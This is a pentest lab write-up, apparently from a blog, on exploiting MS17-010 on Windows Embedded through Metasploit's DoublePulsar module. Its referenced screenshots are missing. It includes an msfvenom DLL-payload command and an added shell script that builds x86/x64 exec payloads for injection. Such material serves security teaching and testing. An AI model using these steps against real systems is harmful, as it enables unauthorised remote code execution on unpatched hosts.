A few weeks ago I was asked to help a bit with the exploitation of MS17-010 on one of the hosts found in a pentest project scope. Below you'll find more details about it. Here we go...
This time we'll start here:
Let's say that during our pentest/project we have to check some scope, and as a first step we ran a basic 'initial port scan' to look around for available hosts and/or services. That's how we found that one of the target hosts is vulnerable to CVE-2017-0144.
To recreate this scenario I decided to prepare a small LAB on my localhost and check what I'm able to do from a Kali VM ;)
Environment
During the project scan our results were similar to those presented on the screen below:
In the case of CVE-2017-0144 I was pretty sure: if the machine is vulnerable we should get a shell, right?
So why was the project-target-host "a problem"? ;)
To continue I used a Kali VM and Windows Embedded. :) Don't be surprised when during your "network scans" you see ports like those presented below:
It'll probably be a Windows Embedded box. And that was the case this time.
Check #01
When my LAB was ready I continued the tests and started Metasploit against my local Windows Embedded hosts. So far we should be somewhere here:
So far, so good. :)
At this stage I changed the MSF module to the next one, presented on the screen below:
So, Neo ;) Can you see why this is not a good way to pwn this host? Let's move forward for a hint, on the screen below:
Got it? ;> If not: check your banners again (from the scan logs) and compare the OS they report with what 'show options' in MSF says about the module's target, if you don't want to read more about it.
Check #02
So after a while, that's how I landed here (thanks!):
After reading the post I was preparing myself for some 'binary adventures' ;) ...and that's how I found this GitHub resource (thanks!):
After reading the README and extracting all the files we should be somewhere here, reading our current PoC module (smb_doublepulsar_rce):
If you next read the (Ruby) PoC located in the extracted directories, you'll see "the difference" (according to Capt. Meelo's post; as you can see on the screen above, I even tried to comment out the if-else check ;) anyway):
It looks like you need to install wine to continue, so if you're ready we should be somewhere here (with our new MSF module added to our resources):
Well, well, well... Should we try to recreate the DLL one more time? I believe so:
# msfvenom -p windows/exec cmd=calc -f dll -o embedrap.dll
We should be somewhere here:
Continuing:
Looks like done. ;)
Of course there are a few other interesting files in those extracted directories...
...but I'll leave it to the Reader as an exercise. ;)
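One thing worth checking before pointing the DoublePulsar module at the regenerated DLL is that the DLL was built for the same architecture as the target: the implant injects the DLL into a process on the box, so an x86/x64 mismatch simply gives you nothing back. The helper below is an added example (not code from the original post, from Capt. Meelo or from the GitHub repo): it wraps the msfvenom call from above and then reads the PE header of the result to confirm the machine type. It assumes msfvenom is on PATH on the Kali VM and reuses the "embedrap.dll" file name from the post; which architecture the target actually runs is for you to determine from your scan/banner data.

```shell
#!/bin/sh
# Added example, not from the original post: rebuild the DLL that the
# smb_doublepulsar_rce module injects, then verify the DLL's PE machine
# type before using it. Assumption: msfvenom is installed (Kali); the
# output name "embedrap.dll" is the one the post uses.

# Read NBYTES at OFFSET from FILE as a little-endian unsigned integer.
le_uint() {  # usage: le_uint FILE OFFSET NBYTES
  od -An -tu1 -v -j "$2" -N "$3" "$1" |
    awk '{ v = 0; for (i = NF; i >= 1; i--) v = v * 256 + $i; print v }'
}

# Print the PE machine type of FILE: x86, x64 or unknown.
# Returns 1 (and prints "not-pe") if FILE is not a PE image at all.
pe_arch() {  # usage: pe_arch FILE
  f=$1
  [ "$(od -An -c -N 2 "$f" | tr -d ' ')" = "MZ" ] || { echo "not-pe"; return 1; }
  lfanew=$(le_uint "$f" 60 4)                        # e_lfanew lives at offset 0x3c
  [ "$(od -An -c -j "$lfanew" -N 2 "$f" | tr -d ' ')" = "PE" ] || { echo "not-pe"; return 1; }
  case $(le_uint "$f" $((lfanew + 4)) 2) in          # IMAGE_FILE_HEADER.Machine
    332)   echo x86 ;;                               # 0x014c IMAGE_FILE_MACHINE_I386
    34404) echo x64 ;;                               # 0x8664 IMAGE_FILE_MACHINE_AMD64
    *)     echo unknown ;;
  esac
}

# Build the DLL with msfvenom for ARCH (x86 -> windows/exec,
# x64 -> windows/x64/exec) and refuse to keep one whose PE header disagrees.
build_dll() {  # usage: build_dll x86|x64 [OUTFILE] [CMD]
  arch=$1 out=${2:-embedrap.dll} cmd=${3:-calc}
  case $arch in
    x86) payload=windows/exec ;;
    x64) payload=windows/x64/exec ;;
    *)   echo "arch must be x86 or x64" >&2; return 1 ;;
  esac
  msfvenom -p "$payload" CMD="$cmd" -f dll -o "$out" || return 1
  got=$(pe_arch "$out") || return 1
  [ "$got" = "$arch" ] || { echo "$out is $got, not $arch" >&2; return 1; }
  echo "$out: $got DLL, architecture matches"
}

# Usage on Kali (not executed automatically):  build_dll x86 embedrap.dll calc
```

Run `build_dll x86` (or `x64`) for the architecture your banner tells you the box is; `pe_arch some.dll` on its own is also handy for sanity-checking DLLs shipped in the extracted directories before you hand them to the module.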
References
If you're looking for more details about this bug and/or how to patch it, check the links below:
- https://en.wikipedia.org/wiki/EternalBlue
- https://nvd.nist.gov/vuln/detail/cve-2017-0144
- https://www.rapid7.com/blog/post/2017/04/18/the-shadow-brokers-leaked-exploits-faq/
- https://www.rapid7.com/db/modules/exploit/windows/smb/smb_doublepulsar_rce/
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
- https://captmeelo.com/category/pentest
- https://github.com/s5uraj/doublepulsar
See you next time!
Cheers